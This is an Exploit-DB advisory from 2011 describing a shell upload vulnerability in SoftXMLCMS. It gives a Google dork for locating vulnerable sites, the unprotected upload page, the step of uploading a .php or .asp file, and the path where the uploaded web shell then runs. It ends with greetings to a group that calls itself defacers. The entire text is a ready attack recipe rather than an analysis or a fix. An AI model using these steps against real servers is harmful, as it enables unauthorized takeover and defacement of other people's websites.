SoftXMLCMS - Arbitrary File Upload

EDB-ID:

17176

CVE:





Platform:

ASP

Date:

2011-04-16


###########################################################################

Exploit Title : softxmlcms  Shell Upload Vulnerability

Google Dork : Powered by softxmlcms

Date : 2011-04-15 

Author : *Alexander* 

Software Link : http://www.softxml.com

Test On : Windows/asp/php

CVE : Web Applications

###########################################################################

===[ Exploit ]===  

http://server/[patch]/XMLEditor2.0/uploadfile1.asp

Select the Choose File And Then Browse File.php  Or File.asp

===[ Upload To ]===

http://server/[patch]/images/File.php

Or

http://server/[patch]/images/File.asp

===[ Demo ]===

http://server/softxmlcms/XMLEditor2.0/uploadfile1.asp

###########################################################################

Greetz : http://Ashiyane.org/Forums

Behrooz_Ice , Q7X , Virangar , Black And All Ashiyane Defacers